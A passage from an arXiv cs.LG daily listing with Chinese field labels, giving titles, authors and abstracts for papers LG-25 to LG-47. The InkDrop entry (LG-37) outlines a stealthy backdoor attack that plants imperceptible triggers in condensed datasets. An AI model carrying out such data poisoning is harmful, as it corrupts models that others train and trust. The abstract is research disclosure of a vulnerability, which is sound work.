adversarial data corruption in offline MARLHF.
[LG-25] MuonEq: Balancing Before Orthogonalization with Lightweight Equilibration
链接: https://arxiv.org/abs/2603.28254
作者: Da Chang,Qiankun Shi,Lvgang Zhang,Yu Li,Ruijie Zhang,Yao Lu,Yongxiang Liu,Ganzhao Yuan
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Orthogonalized-update optimizers such as Muon improve training of matrix-valued parameters, but existing extensions mostly act either after orthogonalization by rescaling updates or before it with heavier whitening-based preconditioners. We introduce \method, a lightweight family of pre-orthogonalization equilibration schemes for Muon in three forms: two-sided row/column normalization (RC), row normalization ®, and column normalization ©. These variants rebalance the momentum matrix before finite-step Newton–Schulz using row/column squared-norm statistics and only \mathcalO(m+n) auxiliary state. We show that finite-step orthogonalization is governed by input spectral properties, especially stable rank and condition number, and that row/column normalization is a zeroth-order whitening surrogate that removes marginal scale mismatch. For the hidden matrix weights targeted by \method, the row-normalized variant R is the natural default and preserves the \widetilde\mathcalO(T^-1/4) stationarity guarantee of Muon-type methods. In LLaMA2 pretraining on C4, the default R variant consistently outperforms Muon on 130M and 350M models, yielding faster convergence and lower validation perplexity.
[LG-26] Detecting the Unexpected: AI-Driven Anomaly Detection in Smart Bridge Monitoring
链接: https://arxiv.org/abs/2603.28225
作者: Rahul Jaiswal,Joakim Hellum,Halvor Heiberg
类目: Machine Learning (cs.LG)
*备注: 6 pages, 14 figures
Abstract:Bridges are critical components of national infrastructure and smart cities. Therefore, smart bridge monitoring is essential for ensuring public safety and preventing catastrophic failures or accidents. Traditional bridge monitoring methods rely heavily on human visual inspections, which are time-consuming and prone to subjectivity and error. This paper proposes an artificial intelligence (AI)-driven anomaly detection approach for smart bridge monitoring. Specifically, a simple machine learning (ML) model is developed using real-time sensor data collected by the iBridge sensor devices installed on a bridge in Norway. The proposed model is evaluated against different ML models. Experimental results demonstrate that the density-based spatial clustering of applications with noise (DBSCAN)-based model outperforms in accurately detecting the anomalous events (bridge accident). These findings indicate that the proposed model is well-suited for smart bridge monitoring and can enhance public safety by enabling the timely detection of unforeseen incidents.
[LG-27] Variational Neurons in Transformers for Language Modeling
链接: https://arxiv.org/abs/2603.28219
作者: Yves Ruffenach
类目: Machine Learning (cs.LG)
*备注: 11 pages, 3 figures
Abstract:Transformers for language modeling usually rely on deterministic internal computation, with uncertainty expressed mainly at the output layer. We introduce variational neurons into Transformer feed-forward computation so that uncertainty becomes part of the internal computation itself. Concretely, we replace deterministic feed-forward units with local variational units based on EVE while preserving the overall Transformer backbone. We evaluate this design in compact next-token language-modeling settings. We compare deterministic and variational variants with both predictive and probabilistic criteria. Alongside negative log-likelihood, perplexity and accuracy, we analyze calibration, conditional variance, mutual information and latent-usage statistics. The resulting picture is clear. Variational neurons integrate stably into Transformers, preserve strong predictive performance and produce informative uncertainty signals. The experiments also show that task quality, useful depth and internal stability are distinct properties. These results establish variational Transformers as a practical form of uncertainty-aware language modeling. They show that Transformers can predict with an explicit internal structure of uncertainty, which supports stronger probabilistic evaluation and a more informative analysis of model behavior. Comments: 11 pages, 3 figures Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.28219 [cs.LG] (or arXiv:2603.28219v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28219 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-28] A Perturbation Approach to Unconstrained Linear Bandits
链接: https://arxiv.org/abs/2603.28201
作者: Andrew Jacobsen,Dorian Baudry,Shinji Ito,Nicolò Cesa-Bianchi
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 50 pages
Abstract:We revisit the standard perturbation-based approach of Abernethy et al. (2008) in the context of unconstrained Bandit Linear Optimization (uBLO). We show the surprising result that in the unconstrained setting, this approach effectively reduces Bandit Linear Optimization (BLO) to a standard Online Linear Optimization (OLO) problem. Our framework improves on prior work in several ways. First, we derive expected-regret guarantees when our perturbation scheme is combined with comparator-adaptive OLO algorithms, leading to new insights about the impact of different adversarial models on the resulting comparator-adaptive rates. We also extend our analysis to dynamic regret, obtaining the optimal \sqrtP_T path-length dependencies without prior knowledge of P_T . We then develop the first high-probability guarantees for both static and dynamic regret in uBLO. Finally, we discuss lower bounds on the static regret, and prove the folklore \Omega(\sqrtdT) rate for adversarial linear bandits on the unit Euclidean ball, which is of independent interest.
[LG-29] A Deep Reinforcement Learning Framework for Closed-loop Guidance of Fish Schools via Virtual Agents
链接: https://arxiv.org/abs/2603.28200
作者: Takato Shibayama,Hiroaki Kawashima
类目: Robotics (cs.RO); Machine Learning (cs.LG); Populations and Evolution (q-bio.PE)
*备注: 18 pages, 8 figures
Abstract:Guiding collective motion in biological groups is a fundamental challenge in understanding social interaction rules and developing automated systems for animal management. In this study, we propose a deep reinforcement learning (RL) framework for the closed-loop guidance of fish schools using virtual agents. These agents are controlled by policies trained via Proximal Policy Optimization (PPO) in simulation and deployed in physical experiments with rummy-nose tetras (Petitella bleheri), enabling real-time interaction between artificial agents and live individuals. To cope with the stochastic behavior of live individuals, we design a composite reward function to balance directional guidance with social cohesion. Our systematic evaluation of visual parameters shows that a white background and larger stimulus sizes maximize guidance efficacy in physical trials. Furthermore, evaluation across group sizes revealed that while the system demonstrates effective guidance for groups of five individuals, this capability markedly degrades as group size increases to eight. This study highlights the potential of deep RL for automated guidance of biological collectives and identifies challenges in maintaining artificial influence in larger groups.
[LG-30] Policy-Controlled Generalized Share: A General Framework with a Transformer Instantiation for Strictly Online Switching-Oracle Tracking
链接: https://arxiv.org/abs/2603.28198
作者: Hongkai Hu
类目: Machine Learning (cs.LG); Statistical Finance (q-fin.ST)
*备注: 44 pages, 6 figures, 5 tables, 1 algorithm. Includes appendix and reproducibility-oriented experiments
Abstract:Static regret to a single expert is often the wrong target for strictly online prediction under non-stationarity, where the best expert may switch repeatedly over time. We study Policy-Controlled Generalized Share (PCGS), a general strictly online framework in which the generalized-share recursion is fixed while the post-loss update controls are allowed to vary adaptively. Its principal instantiation in this paper is PCGS-TF, which uses a causal Transformer as an update controller: after round t finishes and the loss vector is observed, the Transformer outputs the controls that map w_t to w_t+1 without altering the already committed decision w_t. Under admissible post-loss update controls, we obtain a pathwise weighted regret guarantee for general time-varying learning rates, and a standard dynamic-regret guarantee against any expert path with at most S switches under the constant-learning-rate specialization. Empirically, on a controlled synthetic suite with exact dynamic-programming switching-oracle evaluation, PCGS-TF attains the lowest mean dynamic regret in all seven non-stationary families, with its advantage increasing for larger expert pools. On a reproduced household-electricity benchmark, PCGS-TF also achieves the lowest normalized dynamic regret for S = 5, 10, and 20.
[LG-31] Automating Early Disease Prediction Via Structured and Unstructured Clinical Data
链接: https://arxiv.org/abs/2603.28167
作者: Ane G Domingo-Aldama,Marcos Merino Prado,Alain García Olea,Josu Goikoetxea,Koldo Gojenola,Aitziber Atutxa
类目: Machine Learning (cs.LG)
*备注:
Abstract:This study presents a fully automated methodology for early prediction studies in clinical settings, leveraging information extracted from unstructured discharge reports. The proposed pipeline uses discharge reports to support the three main steps of early prediction: cohort selection, dataset generation, and outcome labeling. By processing discharge reports with natural language processing techniques, we can efficiently identify relevant patient cohorts, enrich structured datasets with additional clinical variables, and generate high-quality labels without manual intervention. This approach addresses the frequent issue of missing or incomplete data in codified electronic health records (EHR), capturing clinically relevant information that is often underrepresented. We evaluate the methodology in the context of predicting atrial fibrillation (AF) progression, showing that predictive models trained on datasets enriched with discharge report information achieve higher accuracy and correlation with true outcomes compared to models trained solely on structured EHR data, while also surpassing traditional clinical scores. These results demonstrate that automating the integration of unstructured clinical text can streamline early prediction studies, improve data quality, and enhance the reliability of predictive models for clinical decision-making.
[LG-32] ORACAL: A Robust and Explainable Multimodal Framework for Smart Contract Vulnerability Detection with Causal Graph Enrichment
链接: https://arxiv.org/abs/2603.28128
作者: Tran Duong Minh Dai,Triet Huynh Minh Le,M. Ali Babar,Van-Hau Pham,Phan The Duy
类目: Machine Learning (cs.LG); Cryptography and Security (cs.CR)
*备注: 26 pages
Abstract:Although Graph Neural Networks (GNNs) have shown promise for smart contract vulnerability detection, they still face significant limitations. Homogeneous graph models fail to capture the interplay between control flow and data dependencies, while heterogeneous graph approaches often lack deep semantic understanding, leaving them susceptible to adversarial attacks. Moreover, most black-box models fail to provide explainable evidence, hindering trust in professional audits. To address these challenges, we propose ORACAL (Observable RAG-enhanced Analysis with CausAL reasoning), a heterogeneous multimodal graph learning framework that integrates Control Flow Graph (CFG), Data Flow Graph (DFG), and Call Graph (CG). ORACAL selectively enriches critical subgraphs with expert-level security context from Retrieval-Augmented Generation (RAG) and Large Language Models (LLMs), and employs a causal attention mechanism to disentangle true vulnerability indicators from spurious correlations. For transparency, the framework adopts PGExplainer to generate subgraph-level explanations identifying vulnerability triggering paths. Experiments on large-scale datasets demonstrate that ORACAL achieves state-of-the-art performance, outperforming MANDO-HGT, MTVHunter, GNN-SC, and SCVHunter by up to 39.6 percentage points, with a peak Macro F1 of 91.28% on the primary benchmark. ORACAL maintains strong generalization on out-of-distribution datasets with 91.8% on CGT Weakness and 77.1% on DAppScan. In explainability evaluation, PGExplainer achieves 32.51% Mean Intersection over Union (MIoU) against manually annotated vulnerability triggering paths. Under adversarial attacks, ORACAL limits performance degradation to approximately 2.35% F1 decrease with an Attack Success Rate (ASR) of only 3%, surpassing SCVHunter and MANDO-HGT which exhibit ASRs ranging from 10.91% to 18.73%.
[LG-33] Neural Federated Learning for Livestock Growth Prediction IJCNN2026
链接: https://arxiv.org/abs/2603.28117
作者: Shoujin Wang,Mingze Ni,Wei Liu,Victor W. Chu,Kenny Sabir,Bryan Zheng,Ayush Kanwal,Roy Jing Yang,Fang Chen
类目: Machine Learning (cs.LG)
*备注: Accepted by WCCI 2026 (IJCNN 2026)
Abstract:Livestock growth prediction is essential for optimising farm management and improving the efficiency and sustainability of livestock production, yet it remains underexplored due to limited large-scale datasets and privacy concerns surrounding farm-level data. Existing biophysical models rely on fixed formulations, while most machine learning approaches are trained on small, isolated datasets, limiting their robustness and generalisability. To address these challenges, we propose LivestockFL, the first federated learning framework specifically designed for livestock growth prediction. LivestockFL enables collaborative model training across distributed farms without sharing raw data, thereby preserving data privacy while alleviating data sparsity, particularly for farms with limited historical records. The framework employs a neural architecture based on a Gated Recurrent Unit combined with a multilayer perceptron to model temporal growth patterns from historical weight records and auxiliary features. We further introduce LivestockPFL, a novel personalised federated learning framework that extends the above federated learning framework with a personalized prediction head trained on each farm’s local data, producing farm-specific predictors. Experiments on a real-world dataset demonstrate the effectiveness and practicality of the proposed approaches.
[LG-34] Graph Vector Field: A Unified Framework for Multimodal Health Risk Assessment from Heterogeneous Wearable and Environmental Data Streams
链接: https://arxiv.org/abs/2603.28115
作者: Silvano Coletti,Francesca Fallucchi
类目: Machine Learning (cs.LG)
*备注: 25 pages, 6 appendices. Theoretical framework; no empirical experiments
Abstract:Digital health research has advanced dynamic graph-based disease models, topological learning on simplicial complexes, and multimodal mixture-of-experts architectures, but these strands remain largely disconnected. We propose Graph Vector Field (GVF), a framework that models health risk as a vector-valued field on time-varying simplicial complexes, coupling discrete differential-geometric operators with modality-structured mixture-of-experts. Risk is represented as a vector-valued cochain whose evolution is parameterised with Hodge Laplacians and discrete exterior calculus operators, yielding a Helmholtz-Hodge decomposition into potential-driven (exact), circulation-like (coexact), and topologically constrained (harmonic) components linked to interpretable propagation, cyclic, and persistent risk mechanisms. Multimodal inputs from wearable sensors, behavioural/environmental context, and clinical/genomic data are incorporated through a bundle-structured mixture-of-experts in which modality-specific latent spaces are attached as fibres to the base complex. This separates modality-specific from shared contributions and offers a principled route toward modality-level identifiability. GVF integrates geometric dynamical systems, higher-order topology (enforced indirectly via geometric regularisation and Hodge decomposition), and structured multimodal fusion into a single framework for interpretable, modality-resolved risk modelling. This paper develops the mathematical foundations, architectural design, and formal guarantees; empirical validation is the subject of ongoing work.
[LG-35] Lipschitz verification of neural networks through training
链接: https://arxiv.org/abs/2603.28113
作者: Simon Kuang,Yuezhu Xu,S. Sivaranjani,Xinfan Lin
类目: Machine Learning (cs.LG)
*备注:
Abstract:The global Lipschitz constant of a neural network governs both adversarial robustness and generalization. Conventional approaches to certified training" typically follow a train-then-verify paradigm: they train a network and then attempt to bound its Lipschitz constant. Because the efficient trivial bound" (the product of the layerwise Lipschitz constants) is exponentially loose for arbitrary networks, these approaches must rely on computationally expensive techniques such as semidefinite programming, mixed-integer programming, or branch-and-bound. We propose a different paradigm: rather than designing complex verifiers for arbitrary networks, we design networks to be verifiable by the fast trivial bound. We show that directly penalizing the trivial bound during training forces it to become tight, thereby effectively regularizing the true Lipschitz constant. To achieve this, we identify three structural obstructions to a tight trivial bound (dead neurons, bias terms, and ill-conditioned weights) and introduce architectural mitigations, including a novel notion of norm-saturating polyactivations and bias-free sinusoidal layers. Our approach avoids the runtime complexity of advanced verification while achieving strong results: we train robust networks on MNIST with Lipschitz bounds that are small (orders of magnitude lower than comparable works) and tight (within 10% of the ground truth). The experimental results validate the theoretical guarantees, support the proposed mechanisms, and extend empirically to diverse activations and non-Euclidean norms. Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.28113 [cs.LG] (or arXiv:2603.28113v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28113 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Simon Kuang [view email] [v1] Mon, 30 Mar 2026 07:20:50 UTC (1,849 KB) Full-text links: Access Paper: View a PDF of the paper titled Lipschitz verification of neural networks through training, by Simon Kuang and 3 other authorsView PDFHTML (experimental)TeX Source view license Current browse context: cs.LG prev | next new | recent | 2026-03 Change to browse by: cs References Citations NASA ADSGoogle Scholar Semantic Scholar export BibTeX citation Loading… BibTeX formatted citation loading… Data provided by: Bookmark checked=“checked”> Bibliographic Tools Bibliographic and Citation Tools Bibliographic Explorer Toggle Bibliographic Explorer (What is the Explorer?) Connected Papers Toggle Connected Papers (What is Connected Papers?) Litmaps Toggle Litmaps (What is Litmaps?) scite.ai Toggle scite Smart Citations (What are Smart Citations?) Code, Data, Media Code, Data and Media Associated with this Article alphaXiv Toggle alphaXiv (What is alphaXiv?) Links to Code Toggle CatalyzeX Code Finder for Papers (What is CatalyzeX?) DagsHub Toggle DagsHub (What is DagsHub?) GotitPub Toggle Gotit.pub (What is GotitPub?) Huggingface Toggle Hugging Face (What is Huggingface?) Links to Code Toggle Papers with Code (What is Papers with Code?) ScienceCast Toggle ScienceCast (What is ScienceCast?) Demos Demos Replicate Toggle Replicate (What is Replicate?) Spaces Toggle Hugging Face Spaces (What is Spaces?) Spaces Toggle TXYZ.AI (What is TXYZ.AI?) Related Papers Recommenders and Search Tools Link to Influence Flower Influence Flower (What are Influence Flowers?) Core recommender toggle CORE Recommender (What is CORE?) IArxiv recommender toggle IArxiv Recommender (What is IArxiv?) Author Venue Institution Topic About arXivLabs arXivLabs: experimental projects with community collaborators arXivLabs is a framework that allows collaborators to develop and share new arXiv features directly on our website. Both individuals and organizations that work with arXivLabs have embraced and accepted our values of openness, community, excellence, and user data privacy. arXiv is committed to these values and only works with partners that adhere to them. Have an idea for a project that will add value for arXiv’s community? Learn more about arXivLabs. Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) mathjaxToggle(); About Help contact arXivClick here to contact arXiv Contact subscribe to arXiv mailingsClick here to subscribe Subscribe Copyright Privacy Policy Web Accessibility Assistance arXiv Operational Status
[LG-36] Heddle: A Distributed Orchestration System for Agent ic RL Rollout
链接: https://arxiv.org/abs/2603.28101
作者: Zili Zhang,Yinmin Zhong,Chengxu Yang,Chao Jin,Bingyang Wu,Xinming Wei,Yuliang Liu,Xin Jin
类目: Machine Learning (cs.LG)
*备注:
Abstract:Agentic Reinforcement Learning (RL) enables LLMs to solve complex tasks by alternating between a data-collection rollout phase and a policy training phase. During rollout, the agent generates trajectories, i.e., multi-step interactions between LLMs and external tools. Yet, frequent tool calls induce long-tailed trajectory generation that bottlenecks rollouts. This stems from step-centric designs that ignore trajectory context, triggering three system problems for long-tail trajectory generation: queueing delays, interference overhead, and inflated per-token time. We propose Heddle, a trajectory-centric system to optimize the when, where, and how of agentic rollout execution. Heddle integrates three core mechanisms: trajectory-level scheduling using runtime prediction and progressive priority to minimize cumulative queueing; trajectory-aware placement via presorted dynamic programming and opportunistic migration during idle tool call intervals to minimize interference; and trajectory-adaptive resource manager that dynamically tunes model parallelism to accelerate the per-token time of long-tail trajectories while maintaining high throughput for short trajectories. Evaluations across diverse agentic RL workloads demonstrate that Heddle effectively neutralizes the long-tail bottleneck, achieving up to 2.5 \times higher end-to-end rollout throughput compared to state-of-the-art baselines.
[LG-37] InkDrop: Invisible Backdoor Attacks Against Dataset Condensation
链接: https://arxiv.org/abs/2603.28092
作者: He Yang,Dongyi Lv,Song Ma,Wei Xi,Zhi Wang,Hanlin Gu,Yajie Wang
类目: Machine Learning (cs.LG)
*备注:
Abstract:Dataset Condensation (DC) is a data-efficient learning paradigm that synthesizes small yet informative datasets, enabling models to match the performance of full-data training. However, recent work exposes a critical vulnerability of DC to backdoor attacks, where malicious patterns (\textite.g., triggers) are implanted into the condensation dataset, inducing targeted misclassification on specific inputs. Existing attacks always prioritize attack effectiveness and model utility, overlooking the crucial dimension of stealthiness. To bridge this gap, we propose InkDrop, which enhances the imperceptibility of malicious manipulation without degrading attack effectiveness and model utility. InkDrop leverages the inherent uncertainty near model decision boundaries, where minor input perturbations can induce semantic shifts, to construct a stealthy and effective backdoor attack. Specifically, InkDrop first selects candidate samples near the target decision boundary that exhibit latent semantic affinity to the target class. It then learns instance-dependent perturbations constrained by perceptual and spatial consistency, embedding targeted malicious behavior into the condensed dataset. Extensive experiments across diverse datasets validate the overall effectiveness of InkDrop, demonstrating its ability to integrate adversarial intent into condensed datasets while preserving model utility and minimizing detectability. Our code is available at this https URL.
[LG-38] Koopman-based surrogate modeling for reinforcement-learning-control of Rayleigh-Benard convection
链接: https://arxiv.org/abs/2603.28074
作者: Tim Plotzki,Sebastian Peitz
类目: Machine Learning (cs.LG); Dynamical Systems (math.DS)
*备注:
Abstract:Training reinforcement learning (RL) agents to control fluid dynamics systems is computationally expensive due to the high cost of direct numerical simulations (DNS) of the governing equations. Surrogate models offer a promising alternative by approximating the dynamics at a fraction of the computational cost, but their feasibility as training environments for RL is limited by distribution shifts, as policies induce state distributions not covered by the surrogate training data. In this work, we investigate the use of Linear Recurrent Autoencoder Networks (LRANs) for accelerating RL-based control of 2D Rayleigh-Bénard convection. We evaluate two training strategies: a surrogate trained on precomputed data generated with random actions, and a policy-aware surrogate trained iteratively using data collected from an evolving policy. Our results show that while surrogate-only training leads to reduced control performance, combining surrogates with DNS in a pretraining scheme recovers state-of-the-art performance while reducing training time by more than 40%. We demonstrate that policy-aware training mitigates the effects of distribution shift, enabling more accurate predictions in policy-relevant regions of the state space.
[LG-39] SIMR-NO: A Spectrally-Informed Multi-Resolution Neural Operator for Turbulent Flow Super-Resolution
链接: https://arxiv.org/abs/2603.28073
作者: Muhammad Abid,Omer San
类目: Machine Learning (cs.LG); Fluid Dynamics (physics.flu-dyn)
*备注:
Abstract:Reconstructing high-resolution turbulent flow fields from severely under-resolved observations is a fundamental inverse problem in computational fluid dynamics and scientific machine learning. Classical interpolation methods fail to recover missing fine-scale structures, while existing deep learning approaches rely on convolutional architectures that lack the spectral and multiscale inductive biases necessary for physically faithful reconstruction at large upscaling factors. We introduce the Spectrally-Informed Multi-Resolution Neural Operator (SIMR-NO), a hierarchical operator learning framework that factorizes the ill-posed inverse mapping across intermediate spatial resolutions, combines deterministic interpolation priors with spectrally gated Fourier residual corrections at each stage, and incorporates local refinement modules to recover fine-scale spatial features beyond the truncated Fourier basis. The proposed method is evaluated on Kolmogorov-forced two-dimensional turbulence, where 128\times128 vorticity fields are reconstructed from extremely coarse 8\times8 observations representing a 16\times downsampling factor. Across 201 independent test realizations, SIMR-NO achieves a mean relative \ell_2 error of 26.04% with the lowest error variance among all methods, reducing reconstruction error by 31.7% over FNO, 26.0% over EDSR, and 9.3% over LapSRN. Beyond pointwise accuracy, SIMR-NO is the only method that faithfully reproduces the ground-truth energy and enstrophy spectra across the full resolved wavenumber range, demonstrating physically consistent super-resolution of turbulent flow fields.
[LG-40] From Vessel Trajectories to Safety-Critical Encounter Scenarios: A Generative AI Framework for Autonomous Ship Digital Testing
链接: https://arxiv.org/abs/2603.28067
作者: Sijin Sun,Liangbin Zhao,Ming Deng,Xiuju Fu
类目: Machine Learning (cs.LG)
*备注: 8 pages, submit for review
Abstract:Digital testing has emerged as a key paradigm for the development and verification of autonomous maritime navigation systems, yet the availability of realistic and diverse safety-critical encounter scenarios remains limited. Existing approaches either rely on handcrafted templates, which lack realism, or extract cases directly from historical data, which cannot systematically expand rare high-risk situations. This paper proposes a data-driven framework that converts large-scale Automatic Identification System (AIS) trajectories into structured safety-critical encounter scenarios. The framework combines generative trajectory modeling with automated encounter pairing and temporal parameterization to enable scalable scenario construction while preserving real traffic characteristics. To enhance trajectory realism and robustness under noisy AIS observations, a multi-scale temporal variational autoencoder is introduced to capture vessel motion dynamics across different temporal resolutions. Experiments on real-world maritime traffic flows demonstrate that the proposed method improves trajectory fidelity and smoothness, maintains statistical consistency with observed data, and enables the generation of diverse safety-critical encounter scenarios beyond those directly recorded. The resulting framework provides a practical pathway for building scenario libraries to support digital testing, benchmarking, and safety assessment of autonomous navigation and intelligent maritime traffic management systems. Code is available at this https URL. Comments: 8 pages, submit for review Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.28067 [cs.LG] (or arXiv:2603.28067v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28067 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-41] Physics-Embedded Feature Learning for AI in Medical Imaging
链接: https://arxiv.org/abs/2603.28057
作者: Pulock Das,Al Amin,Kamrul Hasan,Rohan Thompson,Azubike D. Okpalaeze,Liang Hong
类目: Machine Learning (cs.LG); Image and Video Processing (eess.IV)
*备注: 7 pages, 5 figures
Abstract:Deep learning (DL) models have achieved strong performance in an intelligence healthcare setting, yet most existing approaches operate as black boxes and ignore the physical processes that govern tumor growth, limiting interpretability, robustness, and clinical trust. To address this limitation, we propose PhysNet, a physics-embedded DL framework that integrates tumor growth dynamics directly into the feature learning process of a convolutional neural network (CNN). Unlike conventional physics-informed methods that impose physical constraints only at the output level, PhysNet embeds a reaction diffusion model of tumor growth within intermediate feature representations of a ResNet backbone. The architecture jointly performs multi-class tumor classification while learning a latent tumor density field, its temporal evolution, and biologically meaningful physical parameters, including tumor diffusion and growth rates, through end-to-end training. This design is necessary because purely data-driven models, even when highly accurate or ensemble-based, cannot guarantee physically consistent predictions or provide insight into tumor behavior. Experimental results on a large brain MRI dataset demonstrate that PhysNet outperforms multiple state-of-the-art DL baselines, including MobileNetV2, VGG16, VGG19, and ensemble models, achieving superior classification accuracy and F1-score. In addition to improved performance, PhysNet produces interpretable latent representations and learned bio-physical parameters that align with established medical knowledge, highlighting physics-embedded representation learning as a practical pathway toward more trustworthy and clinically meaningful medical AI systems.
[LG-42] Reducing Oracle Feedback with Vision-Language Embeddings for Preference-Based RL ICRA-2026 ICRA2026
链接: https://arxiv.org/abs/2603.28053
作者: Udita Ghosh,Dripta S. Raychaudhuri,Jiachen Li,Konstantinos Karydis,Amit Roy-Chowdhury
类目: Machine Learning (cs.LG)
*备注: Accepted at ICRA 2026. Project page: this https URL
Abstract:Preference-based reinforcement learning can learn effective reward functions from comparisons, but its scalability is constrained by the high cost of oracle feedback. Lightweight vision-language embedding (VLE) models provide a cheaper alternative, but their noisy outputs limit their effectiveness as standalone reward generators. To address this challenge, we propose ROVED, a hybrid framework that combines VLE-based supervision with targeted oracle feedback. Our method uses the VLE to generate segment-level preferences and defers to an oracle only for samples with high uncertainty, identified through a filtering mechanism. In addition, we introduce a parameter-efficient fine-tuning method that adapts the VLE with the obtained oracle feedback in order to improve the model over time in a synergistic fashion. This ensures the retention of the scalability of embeddings and the accuracy of oracles, while avoiding their inefficiencies. Across multiple robotic manipulation tasks, ROVED matches or surpasses prior preference-based methods while reducing oracle queries by up to 80%. Remarkably, the adapted VLE generalizes across tasks, yielding cumulative annotation savings of up to 90%, highlighting the practicality of combining scalable embeddings with precise oracle supervision for preference-based RL.
[LG-43] Diffusion Maps is not Dimensionality Reduction
链接: https://arxiv.org/abs/2603.28037
作者: Julio Candanedo,Alejandro Patiño
类目: Machine Learning (cs.LG)
*备注:
Abstract:Diffusion maps (DMAP) are often used as a dimensionality-reduction tool, but more precisely they provide a spectral representation of the intrinsic geometry rather than a complete charting method. To illustrate this distinction, we study a Swiss roll with known isometric coordinates and compare DMAP, Isomap, and UMAP across latent dimensions. For each representation, we fit an oracle affine readout to the ground-truth chart and measure reconstruction error. Isomap most efficiently recovers the low-dimensional chart, UMAP provides an intermediate tradeoff, and DMAP becomes accurate only after combining multiple diffusion modes. Thus the correct chart lies in the span of diffusion coordinates, but standard DMAP do not by themselves identify the appropriate combination.
[LG-44] FedDES: Graph-Based Dynamic Ensemble Selection for Personalized Federated Learning
链接: https://arxiv.org/abs/2603.28006
作者: Brianna Mueller,W. Nick Street
类目: Machine Learning (cs.LG)
*备注: 10 pages, 2 figures
Abstract:Statistical heterogeneity in Federated Learning (FL) often leads to negative transfer, where a single global model fails to serve diverse client distributions. Personalized federated learning (pFL) aims to address this by tailoring models to individual clients. However, under most existing pFL approaches, clients integrate peer client contributions uniformly, which ignores the reality that not all peers are likely to be equally beneficial. Additionally, the potential for personalization at the instance level remains largely unexplored, even though the reliability of different peer models often varies across individual samples within the same client. We introduce FedDES (Federated Dynamic Ensemble Selection), a decentralized pFL framework that achieves instance-level personalization through dynamic ensemble selection. Central to our approach is a Graph Neural Network (GNN) meta-learner trained on a heterogeneous graph modeling interactions between data samples and candidate classifiers. For each test query, the GNN dynamically selects and weights peer client models, forming an ensemble of the most competent classifiers while effectively suppressing contributions from those that are irrelevant or potentially harmful for performance. Experiments on CIFAR-10 and real-world ICU healthcare data demonstrate that FedDES outperforms state-of-the-art pFL baselines in non-IID settings, offering robust protection against negative transfer. Comments: 10 pages, 2 figures Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.28006 [cs.LG] (or arXiv:2603.28006v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28006 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-45] From Independent to Correlated Diffusion: Generalized Generative Modeling with Probabilistic Computers
链接: https://arxiv.org/abs/2603.27996
作者: Nihal Sanjay Singh,Mazdak Mohseni-Rajaee,Shaila Niazi,Kerem Y. Camsari
类目: Machine Learning (cs.LG); Emerging Technologies (cs.ET)
*备注:
Abstract:Diffusion models have emerged as a powerful framework for generative tasks in deep learning. They decompose generative modeling into two computational primitives: deterministic neural-network evaluation and stochastic sampling. Current implementations usually place most computation in the neural network, but diffusion as a framework allows a broader range of choices for the stochastic transition kernel. Here, we generalize the stochastic sampling component by replacing independent noise injection with Markov chain Monte Carlo (MCMC) dynamics that incorporate known interaction structure. Standard independent diffusion is recovered as a special case when couplings are set to zero. By explicitly incorporating Ising couplings into the diffusion dynamics, the noising and denoising processes exploit spatial correlations representative of the target system. The resulting framework maps naturally onto probabilistic computers (p-computers) built from probabilistic bits (p-bits), which provide orders-of-magnitude advantages in sampling throughput and energy efficiency over GPUs. We demonstrate the approach on equilibrium states of the 2D ferromagnetic Ising model and the 3D Edwards-Anderson spin glass, showing that correlated diffusion produces samples in closer agreement with MCMC reference distributions than independent diffusion. More broadly, the framework shows that p-computers can enable new classes of diffusion algorithms that exploit structured probabilistic sampling for generative modeling.
[LG-46] Principal Prototype Analysis on Manifold for Interpretable Reinforcement Learning
链接: https://arxiv.org/abs/2603.27971
作者: Bodla Krishna Vamshi,Haizhao Yang
类目: Machine Learning (cs.LG)
*备注:
Abstract:Recent years have witnessed the widespread adoption of reinforcement learning (RL), from solving real-time games to fine-tuning large language models using human preference data significantly improving alignment with user expectations. However, as model complexity grows exponentially, the interpretability of these systems becomes increasingly challenging. While numerous explainability methods have been developed for computer vision and natural language processing to elucidate both local and global reasoning patterns, their application to RL remains limited. Direct extensions of these methods often struggle to maintain the delicate balance between interpretability and performance within RL settings. Prototype-Wrapper Networks (PW-Nets) have recently shown promise in bridging this gap by enhancing explainability in RL domains without sacrificing the efficiency of the original black-box models. However, these methods typically require manually defined reference prototypes, which often necessitate expert domain knowledge. In this work, we propose a method that removes this dependency by automatically selecting optimal prototypes from the available data. Preliminary experiments on standard Gym environments demonstrate that our approach matches the performance of existing PW-Nets, while remaining competitive with the original black-box models.
[LG-47] Gradient Manipulation in Distributed Stochastic Gradient Descent with Strategic Agents : Truthful Incentives with Convergence Guarantees
链接: https://arxiv.org/abs/2603.27962
作者: Ziqin Chen,Yongqiang Wang
类目: Machine Learning (cs.LG); Computer Science and Game Theory (cs.GT)
*备注: 19 pages, 8 figures
Abstract:Distributed learning has gained significant attention due to its advantages in scalability, privacy, and fault this http URL this paradigm, multiple agents collaboratively train a global model by exchanging parameters only with their neighbors. However, a key vulnerability of existing distributed learning approaches is their implicit assumption that all agents behave honestly during gradient updates. In real-world scenarios, this assumption often breaks down, as selfish or strategic agents may be incentivized to manipulate gradients for personal gain, ultimately compromising the final learning outcome. In this work, we propose a fully distributed payment mechanism that, for the first time, guarantees both truthful behaviors and accurate convergence in distributed stochastic gradient descent. This represents a significant advancement, as it overcomes two major limitations of existing truthfulness mechanisms for collaborative learning:(1) reliance on a centralized server for payment collection, and (2) sacrificing convergence accuracy to guarantee truthfulness. In addition to characterizing the convergence rate under general convex and strongly convex conditions, we also prove that our approach guarantees the cumulative gain that an agent can obtain through strategic behavior remains finite, even as the number of iterations approaches infinity–a property unattainable by most existing truthfulness mechanisms. Our experimental results on standard machine 